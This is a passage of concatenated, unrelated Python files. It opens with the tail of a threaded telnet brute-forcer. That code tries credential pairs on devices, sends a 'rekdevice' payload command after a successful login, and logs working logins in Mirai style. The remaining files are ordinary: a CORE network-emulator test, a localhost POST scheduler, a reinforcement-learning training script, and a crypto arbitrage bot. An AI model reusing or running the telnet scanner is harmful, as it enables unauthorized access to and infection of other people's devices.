hoho += readUntil(tn, ":")
if ":" in hoho:
tn.send(username + "\r\n")
time.sleep(0.1)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, ":")
if ":" in hoho:
tn.send(password + "\r\n")
time.sleep(0.1)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if "#" in prompt or "$":
success = True
else:
tn.close()
if success == True:
try:
tn.send(self.rekdevice + "\r\n")
fh.write(self.ip + ":23 " + username + ":" + password + "\n") # 1.1.1.1:23 user:pass # mirai
fh.flush()
print "[+] GOTCHA -> %s:%s:%s"%(username, password, self.ip)
tn.close()
break
except:
tn.close()
else:
tn.close()
except Exception:
tn.close()
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def worker():
try:
while True:
try:
IP = queue.get()
thread = router(IP)
thread.start()
queue.task_done()
time.sleep(0.02)
except:
pass
except:
pass
global fh
fh = open("workingtelnet.txt","a")
for l in xrange(threads):
try:
t = threading.Thread(target=worker)
t.start()
except:
pass
|
test_gui.py
|
"""
Unit tests for testing with a CORE switch.
"""
import threading
from core.api.tlv import coreapi, dataconversion
from core.api.tlv.coreapi import CoreExecuteTlv
from core.emulator.enumerations import CORE_API_PORT, NodeTypes
from core.emulator.enumerations import EventTlvs
from core.emulator.enumerations import EventTypes
from core.emulator.enumerations import ExecuteTlvs
from core.emulator.enumerations import LinkTlvs
from core.emulator.enumerations import LinkTypes
from core.emulator.enumerations import MessageFlags
from core.emulator.enumerations import MessageTypes
from core.nodes import ipaddress
def command_message(node, command):
"""
Create an execute command TLV message.
:param node: node to execute command for
:param command: command to execute
:return: packed execute message
"""
tlv_data = CoreExecuteTlv.pack(ExecuteTlvs.NODE.value, node.id)
tlv_data += CoreExecuteTlv.pack(ExecuteTlvs.NUMBER.value, 1)
tlv_data += CoreExecuteTlv.pack(ExecuteTlvs.COMMAND.value, command)
return coreapi.CoreExecMessage.pack(MessageFlags.STRING.value | MessageFlags.TEXT.value, tlv_data)
def state_message(state):
"""
    Create an event TLV message for a new state.
:param core.enumerations.EventTypes state: state to create message for
:return: packed event message
"""
tlv_data = coreapi.CoreEventTlv.pack(EventTlvs.TYPE.value, state.value)
return coreapi.CoreEventMessage.pack(0, tlv_data)
def switch_link_message(switch, node, address, prefix_len):
"""
    Create a link TLV message linking a node to a switch, with the provided address and prefix length.
:param switch: switch for link
:param node: node for link
:param address: address node on link
:param prefix_len: prefix length of address
:return: packed link message
"""
tlv_data = coreapi.CoreLinkTlv.pack(LinkTlvs.N1_NUMBER.value, switch.id)
tlv_data += coreapi.CoreLinkTlv.pack(LinkTlvs.N2_NUMBER.value, node.id)
tlv_data += coreapi.CoreLinkTlv.pack(LinkTlvs.TYPE.value, LinkTypes.WIRED.value)
tlv_data += coreapi.CoreLinkTlv.pack(LinkTlvs.INTERFACE2_NUMBER.value, 0)
tlv_data += coreapi.CoreLinkTlv.pack(LinkTlvs.INTERFACE2_IP4.value, address)
tlv_data += coreapi.CoreLinkTlv.pack(LinkTlvs.INTERFACE2_IP4_MASK.value, prefix_len)
return coreapi.CoreLinkMessage.pack(MessageFlags.ADD.value, tlv_data)
def run_cmd(node, exec_cmd):
"""
Convenience method for sending commands to a node using the legacy API.
    :param node: The node the command should be issued to
:param exec_cmd: A string with the command to be run
:return: Returns the result of the command
"""
# Set up the command api message
# tlv_data = CoreExecuteTlv.pack(ExecuteTlvs.NODE.value, node.id)
# tlv_data += CoreExecuteTlv.pack(ExecuteTlvs.NUMBER.value, 1)
# tlv_data += CoreExecuteTlv.pack(ExecuteTlvs.COMMAND.value, exec_cmd)
# message = coreapi.CoreExecMessage.pack(MessageFlags.STRING.value | MessageFlags.TEXT.value, tlv_data)
message = command_message(node, exec_cmd)
node.session.broker.handlerawmsg(message)
# Now wait for the response
server = node.session.broker.servers["localhost"]
server.sock.settimeout(50.0)
# receive messages until we get our execute response
result = None
status = False
while True:
message_header = server.sock.recv(coreapi.CoreMessage.header_len)
message_type, message_flags, message_length = coreapi.CoreMessage.unpack_header(message_header)
message_data = server.sock.recv(message_length)
# If we get the right response return the results
print("received response message: %s" % message_type)
if message_type == MessageTypes.EXECUTE.value:
message = coreapi.CoreExecMessage(message_flags, message_header, message_data)
result = message.get_tlv(ExecuteTlvs.RESULT.value)
status = message.get_tlv(ExecuteTlvs.STATUS.value)
break
return result, status
class TestGui:
def test_broker(self, cored):
"""
Test session broker creation.
        :param cored: cored daemon server to test with
"""
# set core daemon to run in the background
thread = threading.Thread(target=cored.server.serve_forever)
thread.daemon = True
thread.start()
# ip prefix for nodes
prefix = ipaddress.Ipv4Prefix("10.83.0.0/16")
daemon = "localhost"
# add server
session = cored.server.coreemu.create_session()
session.broker.addserver(daemon, "127.0.0.1", CORE_API_PORT)
# setup server
session.broker.setupserver(daemon)
# do not want the recvloop running as we will deal ourselves
session.broker.dorecvloop = False
# have broker handle a configuration state change
session.set_state(EventTypes.CONFIGURATION_STATE)
event_message = state_message(EventTypes.CONFIGURATION_STATE)
session.broker.handlerawmsg(event_message)
# create a switch node
switch = session.add_node(_type=NodeTypes.SWITCH)
switch.setposition(x=80, y=50)
switch.server = daemon
# retrieve switch data representation, create a switch message for broker to handle
switch_data = switch.data(MessageFlags.ADD.value)
switch_message = dataconversion.convert_node(switch_data)
session.broker.handlerawmsg(switch_message)
# create node one
node_one = session.add_node()
node_one.server = daemon
# create node two
node_two = session.add_node()
node_two.server = daemon
# create node messages for the broker to handle
for node in [node_one, node_two]:
node_data = node.data(MessageFlags.ADD.value)
node_message = dataconversion.convert_node(node_data)
session.broker.handlerawmsg(node_message)
# create links to switch from nodes for broker to handle
for index, node in enumerate([node_one, node_two], start=1):
ip4_address = prefix.addr(index)
link_message = switch_link_message(switch, node, ip4_address, prefix.prefixlen)
session.broker.handlerawmsg(link_message)
# change session to instantiation state
event_message = state_message(EventTypes.INSTANTIATION_STATE)
session.broker.handlerawmsg(event_message)
        # Get the ip of the first node and ping it from the second
output, status = run_cmd(node_one, "ip -4 -o addr show dev eth0")
pingip = output.split()[3].split("/")[0]
output, status = run_cmd(node_two, "ping -c 5 " + pingip)
assert not status
|
test.py
|
# -*- coding: utf-8 -*-
import time
import threading
import urllib.request, urllib.parse, urllib.error
from datetime import datetime
def schedule():
addr = "1a:2b:3c:46:2b:3c 1a:2b:3c:46:2b:3c 1a:2b:3c:4e:5f:6g"
print("post")
data = {}
data["addr"] = addr
url = "http://127.0.0.1:5000"
try:
data = urllib.parse.urlencode(data).encode("utf-8")
req = urllib.request.Request(url, data=data, method="POST")
with urllib.request.urlopen(req) as res:
res = res.read().decode("utf-8")
print(res)
except:
print('Error')
addr2 = "1a:2b:3c:46:2b:3c"
print("post")
data = {}
data["addr2"] = addr2
url = "http://127.0.0.1:5000/2"
try:
data = urllib.parse.urlencode(data).encode("utf-8")
req = urllib.request.Request(url, data=data, method="POST")
with urllib.request.urlopen(req) as res:
res = res.read().decode("utf-8")
print(res)
except:
print('Error')
addr3 = "1a:2b:3c:46:2b:3c"
print("post")
data = {}
data["addr3"] = addr3
url = "http://127.0.0.1:5000/3"
try:
data = urllib.parse.urlencode(data).encode("utf-8")
req = urllib.request.Request(url, data=data, method="POST")
with urllib.request.urlopen(req) as res:
res = res.read().decode("utf-8")
print(res)
except urllib.error.HTTPError as err:
print(err.reason)
def scheduler(interval, f, wait = True):
base_time = time.time()
next_time = 0
while True:
t = threading.Thread(target = f)
t.start()
if wait:
t.join()
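        # Drift-free scheduling: (base_time - time.time()) is negative, so the modulo gives
        # the time left until the next multiple of `interval` measured from base_time
        # (e.g. with interval=3 and 1.2 s elapsed, -1.2 % 3 == 1.8). A result of exactly 0
        # falls back to sleeping a full interval.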
next_time = ((base_time - time.time()) % interval) or interval
time.sleep(next_time)
if __name__ == "__main__":
scheduler(3, schedule, True)
|
solve_hopper_sb3_sac_cnn.py
|
#!/usr/bin/env python3
import time
import tqdm
import shutil
import datetime
import os.path
import torch as th
import os
from pyvirtualdisplay import Display
import inspect
from typing import Optional, Union, List, Tuple, Dict, Type, Any
import argparse
import csv
from multiprocessing import Process, Queue
from stable_baselines3.ppo import CnnPolicy
from stable_baselines3.ppo import PPO
from stable_baselines3.sac import SAC
import stable_baselines3
import torch.nn as nn
import gym
from stable_baselines3.common.callbacks import CheckpointCallback
import autoencoding_rl
import lr_gym
import lr_gym.utils.dbg.ggLog as ggLog
from lr_gym.envs.HopperVisualEnv import HopperVisualEnv
from lr_gym.envs.GymEnvWrapper import GymEnvWrapper
from lr_gym.envControllers.GazeboController import GazeboController
from lr_gym.envs.RecorderGymWrapper import RecorderGymWrapper
from autoencoding_rl.DeeperCNNPolicy import DeeperCnnPolicySAC
def main(envsNum : int, fileToLoad=None, run_id_prefix : str = "", seed=0) -> Dict[str, Any]:
    """
    Train a SAC agent with a CNN policy on HopperVisualEnv, or evaluate a pre-trained
    model if fileToLoad is provided. Returns the evaluation results as a dict.
    """
logFolder = lr_gym.utils.utils.lr_gym_startup(__file__, inspect.currentframe(),run_id_prefix=run_id_prefix)
img_height = 64
img_width = 64
trainSteps = 10000000
targetFps = 50
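    # With targetFps = 50 the control period is 1/50 = 0.02 s; since three stacked frames
    # form one observation, each simulation step lasts about 0.02/3 ~= 0.0067 s so that a
    # stacked observation still spans one 20 ms control period.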
stepLength_sec = (1/targetFps)/3 #Frame stacking reduces by 3 the fps
def constructEnv(i):
env = GymEnvWrapper(HopperVisualEnv( startSimulation = True,
simulatorController = GazeboController(stepLength_sec = stepLength_sec),
stepLength_sec = stepLength_sec,
obs_img_height_width = (img_height,img_width),
imgEncoding = "int"),
episodeInfoLogFile = logFolder+"/GymEnvWrapper_log."+str(i)+".csv")
return env
env = stable_baselines3.common.vec_env.SubprocVecEnv([lambda i=i: constructEnv(i) for i in range(envsNum)])
#setup seeds for reproducibility
RANDOM_SEED=seed
env.seed(RANDOM_SEED)
env.action_space.seed(RANDOM_SEED)
env._max_episode_steps = 500 #limit episode length
device = "cuda"
print("Built environment, will now start...")
time.sleep(5)
if fileToLoad is None:
model = SAC(DeeperCnnPolicySAC, env, verbose=1,
batch_size=256,
buffer_size=50000,
gamma=0.98,
tau=0.02,
learning_rate=0.00073,
learning_starts=1000,
policy_kwargs={"log_std_init":-2, "net_arch":[64,64]},
use_sde_at_warmup=True,
use_sde=True,
seed = seed,
device = device,
train_freq=(1,"episode"),
gradient_steps=60)
ggLog.info("Learning...")
t_preLearn = time.time()
model.learn(total_timesteps=trainSteps)
duration_learn = time.time() - t_preLearn
ggLog.info("Learned. Took "+str(duration_learn)+" seconds.")
model.save(logFolder+"/trained_model_trainSteps.zip")
else:
model = SAC.load(fileToLoad)
ggLog.info("Loaded pre-trained model "+fileToLoad)
ggLog.info("Evaluating policy...")
t_preVal = time.time()
trainedSteps = model.num_timesteps
eval_results = lr_gym.utils.utils.evaluatePolicy(env, model, 100)
eval_results["env_steps"] = trainedSteps
ggLog.info("Evaluated policy:")
for prop in eval_results:
print(f" {prop} : {eval_results[prop]}")
env.close()
return eval_results
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("--envsNum", required=False, default=1, type=int, help="Number of environments to run in parallel")
ap.add_argument("--load", default=None, type=str, help="load this model instead of performing the training")
ap.add_argument("--seed", default=0, type=int, help="Random seed to use")
ap.add_argument("--xvfb", default=False, action='store_true', help="Run with xvfb")
ap.set_defaults(feature=True)
args = vars(ap.parse_args())
if args["xvfb"]:
disp = Display()
disp.start()
if args["load"] is not None:
with open("eval_"+datetime.datetime.now().strftime('%Y%m%d-%H%M%S')+".csv","w") as csvfile:
csvwriter = csv.writer(csvfile, delimiter = ",")
neverWroteToCsv = True
filesToLoad = lr_gym.utils.utils.fileGlobToList(args["load"])
for file in filesToLoad:
print("Will now evaluate model "+file+"...")
                #time.sleep(10)
                # Run the evaluation in a subprocess to avoid issues with ros initialization;
                # pass the results back to this process through a multiprocessing Queue.
                result_queue = Queue()
                def func(file, result_queue):
                    result_queue.put(main(fileToLoad=file, run_id_prefix="eval_", envsNum = args["envsNum"], seed = args["seed"]))
                p = Process(target=func, args=(file, result_queue))
                p.start()
                eval_results = result_queue.get()
                p.join()
                eval_results["file"] = file
                if neverWroteToCsv:
                    csvwriter.writerow(eval_results.keys())
                    neverWroteToCsv = False
                csvwriter.writerow(eval_results.values())
csvfile.flush()
else:
main(envsNum = args["envsNum"])
if args["xvfb"]:
disp.stop()
|
arb2.py
|
# general default options
from config import *
# Basic objects
from Balance import *
from Pair import *
from Trades import *
# The individual markets and handling of them
from poloniex import *
from gdax import *
# Our gui
from window import *
# trading algo api
from vanilla import *
import threading
import json
import time
import curses
import copy
import logging
logger = logging.getLogger(__name__)
hdlr = logging.FileHandler('logs/logger.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s',datefmt='%s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.WARNING)
class Book(object):
def __init__(self,m,numCur):
# numCur is the amount of currencies we are
# going to be tracking across all the exchanges
# eg, ltc/btc, ftc/btc would be 2 etc.
# keep track of running time
self.__started = time.time()
# an array of market objects
self.markets = m
# this is the default order for currency
self.currencies = ["ltc", "usd","lsd"]
        # Use the pair object to create an array of the
# best currency markets
# we may need to put the market name/index number
# in the Pair object so that we can later match
# The form that the pair objects in ask/bid will take
# inside this arbitrage object is as follows, and
# note: IS DIFFERENT FROM DEFAULT PAIR.
# [price, quantity, index, marketbalance, marketidx]
self.pairs = []
self.trades = []
for x in range(0,numCur):
self.pairs.append(Pair('arb',x,50,[dq,dq,dq],0))
self.trades.append(Trades('arb',x,50,0))
# Variables to keep track of overall profit / trade
# volume....This will need to be corrected for multiple
        # currency pairs as the price/volume is drastically different
self.tprofit = D('0')
self.ttrades = []
for x in range(0,numCur):
self.ttrades.append(D('0'))
# Strings for the logger
self.last_arb = ""
self.last_best =""
self.last_string = ""
# This is for our draw screen function
self.screen_update = time.time()
# This sets up the balance sheets for all our currencies
# we use this to tell if we are way off the mark and need
# to buy/sell a currency to bring us back to a flat line
self.market_balances = Balance()
for m in self.markets:
for k,v in m.balances.funds.items():
self.market_balances.funds[k] += v
self.__initial_market_balances = copy.deepcopy(self.market_balances)
# Write out our initial balances to our log file
self.logger(self.stringFormat(0,0,0,2))
# This lets our main loop know if we entered an arb state
# so that we can run checkbooks/etc
self.entered_arb = 0
# This is a counter, to check our books a couple times
# then stop so we don't just check all the time as
# really, unless there is a change in 3-5 minutes
# there shouldnt be any further change
self.arb_counter = 0
#
# This is the discrepancy from the base balance we
# are off in each market - should use to adjust order
# trades in the future
#
# This is either + or - from the base
# + means we should sell more (or buy less)
# - means we should buy more (or sell less)
#
self.discrep = { 'usd': D('0'),
'ltc': D('0'),
'btc': D('0')
}
###################################
#
# Orderbook getting section
#
#
# This is the main function which gets all the orderbook data
# from the redis server.
# layout is as follows:
# get key from redis which signals markets updated
# get all the data from redis ->
# process data into each market.pair
# build master order book for each pair
# done
    # loops forever refreshing the book; when called with initial=1 it does a single pass and returns
#
#
#
#
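    # Key naming used below (as derived from the calls in this method): each market keeps
    # per-pair sorted sets named "<market>:<currency>:ask" / "<market>:<currency>:bid"
    # (e.g. "gdax:ltc:ask"), and the merged order books are built with ZUNIONSTORE into
    # "ob:<currency>:ask" / "ob:<currency>:bid".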
def buildBooks(self, loc, initial = 0):
global perf_list
perf_start = time.perf_counter()
while True:
try:
#perf_start = time.perf_counter()
pid = self.pairs[loc]
tempd = {}
                r_server = redis.Redis(connection_pool=r_pool, charset="utf-8", decode_responses=True)
r_pipe = r_server.pipeline()
if initial == 1:
zunion_flag = 1
else:
zunion_flag = 0
for idx, mkt in enumerate(self.markets):
# due to old structure, we must make a temp dict to store
# data used for algos, namely the pos, mkt balance, and mkt idx
mktb = mkt.balances.getAvail(self.currencies[loc])
# and the markets current btc balance
mktbtc = mkt.balances.getAvail(UNDERLYING[loc])
tempd[mkt.mname] = {'idx' : idx, 'posa':0, 'posb':0,'mktbtc':mktbtc, 'mktb':mktb, 'min_q':MIN_COIN}
# this is seeing if an update passed since last time
# we qeue up responses no matter what and will just
# skip the 0's later
if mkt.pairs[loc] != 0:
r_pipe.zrange(mkt.mname + ":" + self.currencies[loc] +":ask",0,25)
r_pipe.zrevrange(mkt.mname + ":" + self.currencies[loc] +":bid",0,25)
zunion_flag = 1
if initial == 1:
tempd[mkt.mname]['min_q'] = MIN_COIN
else:
try:
tempd[mkt.mname]['min_q'] = mkt.pairs[loc].min_trade_quantity()
except:
tempd[mkt.mname]['min_q'] = MIN_COIN
else:
r_pipe.echo('0')
r_pipe.echo('0')
if zunion_flag == 1:
# Need a better solution for this
if UNDERLYING[loc] == 'usd':
ztempa = [x.mname + ":" + self.currencies[loc] + ":ask" for x in self.markets if tempd[x.mname]['mktbtc'] > D('1') ]
else:
ztempa = [x.mname + ":" + self.currencies[loc] + ":ask" for x in self.markets if tempd[x.mname]['mktbtc'] > MIN_BTC ]
ztempb = [x.mname + ":" + self.currencies[loc] + ":bid" for x in self.markets if tempd[x.mname]['mktb'] > tempd[x.mname]['min_q'] ]
if ztempa:
r_pipe.zunionstore("ob:"+self.currencies[loc]+":ask", ztempa)
if ztempb:
r_pipe.zunionstore("ob:"+self.currencies[loc]+":bid", ztempb)
r_pipe.zrange("ob:"+self.currencies[loc]+":ask" ,0,100)
r_pipe.zrevrange("ob:"+self.currencies[loc]+":bid",0,100)
else:
r_pipe.echo('0')
r_pipe.echo('0')
r_pipe.echo('0')
r_pipe.echo('0')
#perf_start = time.perf_counter()
# so this will be a list as [[mkt1 ask's], [mkt1 bids], 0, 0, [mkt3 asks], ..., [zunion asks], [zunion bids]]
resp = r_pipe.execute()
#perf_end = time.perf_counter()
#
# from top to here,
# this section is ~~.0028s
#
#
#perf_start = time.perf_counter()
# now parse the data
# first reparse each individal markets pairs
i = 0
for idx, mkt in enumerate(self.markets):
if resp[i] == '0':
i +=2
continue
else:
with lock:
mkt.getBook(loc, [resp[i], resp[i+1]],time.time())
i+=2
#
# time here must be roughly ~~.002s
#
# now main book
if resp[-1] != '0':
# due to other places using this we need to lock here (eg: window thread calls this and
# if these are deleted during update we will crash)
perf_start = time.perf_counter()
with lock:
#[fee_price, quantity, pos, mkt balance, mkt idx, timer]
pid.asks = []
for x in resp[-2]:
order = x.split(":")
mktb = tempd[order[3]]['mktb']
idx = tempd[order[3]]['idx']
pos = tempd[order[3]]['posa']
tempd[order[3]]['posa'] += 1
if D(order[1]) < tempd[order[3]]['min_q']:
ignore,b = mkt.NullPrice()
order[1] = b[1]
order[2] = b[0]
else:
pid.asks.append([D(order[2]), D(order[1]),pos,mktb,idx,float(order[4])])
pid.bids = []
for x in resp[-1]:
order = x.split(":")
mktb = tempd[order[3]]['mktb']
idx = tempd[order[3]]['idx']
pos = tempd[order[3]]['posb']
tempd[order[3]]['posb'] += 1
if D(order[1]) < tempd[order[3]]['min_q']:
ignore,b = mkt.NullPrice()
order[1] = b[1]
order[2] = b[0]
else:
pid.bids.append([D(order[2]), D(order[1]),pos,mktb,idx,float(order[4])])
perf_end = time.perf_counter()
perf_list.append(perf_end - perf_start)
#
# sub block time is ~~.002s
#
#
# This block from after r_pipe.execute
# is ~~.004s
#
#
time.sleep(.01)
if initial == 1:
break
except:
logger.exception("main arb build books")
time.sleep(5)
# Stub allows us to thread this function to allow quicker
# execution
def skewStub(self, x):
if x.mname == 'BTCe' or x.mname == 'gdax' or x.mname == 'kraken' or x.mname == 'gemini':
x.skew_order = 1
x.skew_cancel = 1
else:
result = x.calcSkew(0)
if result != True:
if result == -2:
x.skew_order = x.trade_lag
x.skew_cancel = x.trade_lag
else:
try:
x.cancelAllOrder()
except:
pass
# This is a threaded subfunction which looks at each market and
# sees if we need to canceltrades/update orderbook.
#
# The rules are as follows:
# if need_update = 0 nothing is needed
#
# if need_update = 1 means trade succeded and we update books
# if hold trade, most likely something failed so we don't go until
# everything is checked.
def setMarketBooks(self):
if self.entered_arb != 1:
if self.arb_counter > 0:
self.arb_counter -= 1
prior = threading.active_count()
p_timeout = time.time()
for m in self.markets:
t = threading.Thread(target = m.setBalance)
t.start()
while (threading.active_count() > prior) and (time.time() - 60 < p_timeout):
time.sleep(1)
# So arb has happened, we should set the counter to 3, then
# continue with normal getting of balances.
else:
# Set to default of 4, so we check books four times,
# then we should be good.
self.arb_counter = 6
for m in self.markets:
m.setBalance()
self.sumBooks()
self.logger(self.stringFormat(0,0,0,2))
# This is going to process our initial book versus our current book
    # If it is way out of whack it will call fixBook, which will initiate
    # a trade to correct the imbalance.
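    # Worked example (illustrative numbers only): with an initial ltc balance of 100 and a
    # current balance of 100.2, avg = 100.1, difference = 0.2 and abs_d ~= 0.002 > 0.001,
    # so fixBook('ltc', 0.2) is called and, since the difference is positive, it works the
    # bid side to sell roughly 0.2 ltc back towards the initial balance.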
def checkBooks(self):
# First we ensure that all books are up to date
# this also means that none should be held
for m in self.markets:
if m.need_update >= m.hold_trade > 0:
return False
cur_book = self.market_balances
initial_b = self.__initial_market_balances
for k,v in cur_book.funds.items():
# we don't want to balance btc at all
if k == 'btc':
continue
# create the absolute average difference
avg = (cur_book.funds[k] + initial_b.funds[k]) / 2
difference = cur_book.funds[k] - initial_b.funds[k]
if avg != 0:
abs_d = abs(difference / avg)
else:
abs_d = 0
            # This implies that we are more than 0.1% off the starting values in
            # the coins, so either we are ahead or behind.
# either way we should try to come back to the
# initial balance and take profit or eat loss
if abs_d > .001:
# min quantity on most markets is .01, so we cant correct here
if k == 'usd' and abs(difference) < 6:
continue
                # so we are going to buy or sell based on the difference
self.logger("market needs to be fixed....{0}, {1}".format(k, difference))
# dont want to make use of discrep here, so null it out
self.getDiscrep(k)
self.fixBook(k, difference)
# Since there was actually a market change we should reprint the balance
# ticker tape.
self.sumBooks()
self.logger(self.stringFormat(0,0,0,2))
# Since everything is now "fixed" we can set this to
# 0 so we don't keep calling it
self.entered_arb = 0
return True
# This method fixes our orderbook by doing a one way trade
def fixBook(self, coin, diff):
try:
for indexr,k in enumerate(self.currencies):
if coin == k:
pid = self.pairs[indexr]
loc = indexr
break
# get the discrep
discrep = self.getDiscrep(coin)
# This means we need to buy the currency
if diff < 0:
top = pid.asks
bysl = "ask"
else:
top = pid.bids
bysl = "bid"
quant = abs(diff + discrep)
i = 0
counter = 0
while quant > 0 and i+3 < len(top) and counter < 10:
h = top[i]
mkt = self.markets[h[4]]
# So three possible iterations, we may get caught in a loop of low values
if counter > 3 or i > 6:
if quant < .01:
# start lowering the amount of quant
quant -= D(i) * D('.001')
# we don't trade this pair on this exchange
if mkt.pairs[loc] == 0:
i += 1
continue
# we shouldnt be here if we have a hold
if mkt.hold_trade == 1:
i += 1
continue
with lock:
try:
if bysl == "ask":
order = mkt.pairs[loc].getA(h[2])
else:
order = mkt.pairs[loc].getB(h[2])
except IndexError:
return
min_quant = min(quant,order[1])
if not mkt.calcBalance(loc, coin,order[0],min_quant,bysl):
i += 1
continue
if mkt.pairs[loc].min_trade_quantity() > min_quant:
i += 1
continue
opts = { 'loc' : loc,
'side': bysl,
'price':order[0],
'quantity':min_quant,
'ioc': True
}
# try not locking this section
temp_q = mkt.postTrade(opts)
if temp_q != -1:
quant -= temp_q
mkt.quickBalances(loc,[mkt,bysl,order,temp_q])
i = 0
counter += 1
except:
logger.exception("in fixbook")
# This adds up all the books into our one marketsheet
def sumBooks(self):
for k,v in self.market_balances.funds.items():
self.market_balances.funds[k] = 0
for m in self.markets:
self.market_balances.funds[k] += m.balances.getCurrency(k)
# checks if a market is held, if so return True
def checkHoldTrade(self):
for m in self.markets:
if m.hold_trade == 1:
return True
return False
# Creates custom strings for use in keeping track of arbs and
# also for writing out to logs.
def stringFormat(self, ask, bid, pairn, arb=0, p=D('0') , q=D('0') ):
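# arb=1 formats an executed-arbitrage line, arb=2 a balance summary line, anything else a plain ask/bid spread line.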
ds = D('.00000001')
if arb == 1:
return "M:{6} [{0}:{1} a], [{2}:{3} b]ARB: Q:{4} P:{5}".format(
ask[0].quantize(ds), # price
self.markets[ask[4]].mname, # market
bid[0].quantize(ds),
self.markets[bid[4]].mname,
q.quantize(ds),
p, pairn
)
elif arb == 2:
return "BAL: BTC: {0}, LTC: {2}, USD : {1}".format(
self.market_balances.getCurrency('btc').normalize(),
self.market_balances.getCurrency('usd').normalize(),
self.market_balances.getCurrency('ltc').normalize()
)
else:
return 'M:{4} [{0}:{1} a], [{2}:{3} b]'.format(
ask[0].normalize(),
self.markets[ask[4]].mname,
bid[0].normalize(),
self.markets[bid[4]].mname,
pairn
)
# writes logs of everything
def logger(self,strg):
# just to prevent spamming the arb
if self.last_string == strg:
return
else:
filename = "logs/" + "arb.logs"
f = open(filename,'a')
t = "T: {0} {1} \n".format(int(time.time()), strg)
f.write(t)
f.close()
self.last_string = strg
# Gets the amount we are off in each coin value
# if we are getting this, we assume that we are
# placing a trade, so nulls the value out on the
# discrep value
def getDiscrep(self, coin = 'ltc'):
d = self.discrep[coin]
self.discrep[coin] = D('0')
return d
def setDiscrep(self):
cur_book = self.market_balances
initial_b = self.__initial_market_balances
for k,v in cur_book.funds.items():
if k == 'btc':
continue
else:
self.discrep[k] = cur_book.funds[k] - initial_b.funds[k]
# Just returns the difference from current balance - initial
def coinBal(self, coin = 'btc'):
bal = self.market_balances.getCurrency(coin) - self.__initial_market_balances.getCurrency(coin)
return bal
# Returns the initial balances
def getIBal(self, coin = 'btc'):
return self.__initial_market_balances.getCurrency(coin)
# Here is the actual running program
# Screen loop for a thread
def screenLoop(screen, arb, makr, vana, wind):
global var, scrd
while var == 1:
# This will drop our CPU usage down a bit...
time.sleep(.1)
c = screen.getch()
if c != -1:
for x in ['0','1', '2']:
if c == ord(x):
scrd = int(x)
if c == ord('q'):
var = 0
return
if c == ord('b'):
scrd = 'b'
if c == ord('t'):
scrd = 't'
if c == ord('y'):
scrd = 'y'
if c == ord('m'):
scrd = 'm'
if c == ord('o'):
scrd = 'o'
lock.acquire()
try:
if scrd == 'b':
wind.drawBalances(screen,arb)
elif scrd == 'm':
wind.drawMarket(screen,1,arb,makr)
elif scrd == 't':
wind.drawTriangle(screen,arb,0)
elif scrd == 'y':
wind.drawTriangle(screen,arb,1)
elif scrd == 'o':
wind.drawOrders(screen,makr)
else:
wind.drawScreen(screen,scrd,arb,vana)
except:
logger.exception("in window")
pass
finally:
lock.release()
# GLOBAL VARIABLES
scrd = 0
var = 1
def main(screen):
markets = [gemini(), gdax()]
book = Book(markets,3)
vana = vanilla()
wind = window()
screen.nodelay(1)
global var
booktime = time.time()
skew_time = time.time() - 570
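# Start skew_time 570 s in the past so the first skew check (run every 600 s) happens about 30 s after startup.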
alive_check = time.time()
alive_reset = time.time()
# arb.getTrades(0)
# arb.getTrades(1)
book.buildBooks(0,1)
book.buildBooks(1,1)
book.buildBooks(2,1)
b0 = threading.Thread(target = book.buildBooks, args = (0,))
b0.daemon = True
b0.start()
b1 = threading.Thread(target = book.buildBooks, args = (1,))
b1.daemon = True
b1.start()
b2 = threading.Thread(target = book.buildBooks, args = (2,))
b2.daemon = True
b2.start()
t = threading.Thread(target = screenLoop, args = (screen,book,markets,vana,wind,))
t.daemon = True
t.start()
base_t = threading.active_count()
for x in book.markets:
x.cancelAllOrder()
while var == 1:
# There is a chance that an actually viable crossing might
# be taken out by delayed retrievals of orderbooks,
# so we wait for that to finish, then check and
# see if any crossings took place.
if threading.active_count() == base_t:
try:
time.sleep(1)
vana.checkArb(1,book)
vana.checkArb(0,book)
#vana.checkArb(2,book)
except:
logger.exception('in vana.checkarb')
pass
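# Refresh the books when an arb just happened, a market is held, the books are stale (>60 s) while arb_counter is still counting down, or they are older than 600 s.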
if book.entered_arb == 1 or book.checkHoldTrade() or (((time.time() - booktime) > 60) and (book.arb_counter > 0)) or ((time.time() - booktime) > 600):
# we don't want to spam if we are in a loop
if (time.time() - booktime) < 15:
pass
else:
book.setMarketBooks()
# We might run into a condition where our threaded setBalance
# doesn't complete and update the prior, "fixed" books so we
# double down and repeat the last correction.
# We will now just update the screen until the prior
# threads finish, and continue with checking
book.sumBooks()
book.checkBooks()
# just to make sure we are no longer looping here
book.entered_arb=0
booktime = time.time()
# set the discrep values, our book should be updated as
# best as possible at this point so anything extra should
# be added here
book.setDiscrep()
# We need to make sure we are not somehow bleeding out money while
# away, so this just checks if our BTC balance has dropped by more than .01, which is
# the limit for an unacceptable loss. That is literally a huge
# amount at this point in time.
if book.coinBal() < D('-.01'):
book.logger('exit from bal < -.01 {} '.format(book.coinBal()))
var = 0
# Check skew every 10 minutes
if skew_time + 600 < time.time():
prior = threading.active_count()
p_timeout = time.time()
for x in book.markets:
t = threading.Thread(target = book.skewStub, args = (x,))
t.start()
while (threading.active_count() > prior) and (time.time() - 60 < p_timeout):
time.sleep(1)
skew_time = time.time()
# check exchange health every minute
if time.time() - alive_check > 60:
for x in book.markets:
if x.checkHealth() is False:
book.logger('{} returned bad health'.format(x.mname))
alive_check = time.time()
time.sleep(.5)
if time.time() - alive_reset > 1800:
for x in book.markets:
x.fixHealth()
time.sleep(10)
alive_reset = time.time()
book.logger(book.stringFormat(0,0,0,2))
for x in book.markets:
x.cancelAllOrder()
if __name__ == '__main__':
curses.wrapper(main)
|
Multi_proc_main.py
|
import matplotlib
import matplotlib.pyplot as plt
import tkinter as tk
from tkinter.ttk import Progressbar
from tkinter import filedialog
from PIL import Image, ImageTk
import multiprocessing
import serial as sr
import time
import random
import numpy as np
import get_send_data as gt
import os,os.path
import axes_robot as rbt
import roboticstoolbox as rp
#from spatialmath import *
import plot_graph_2 as plots
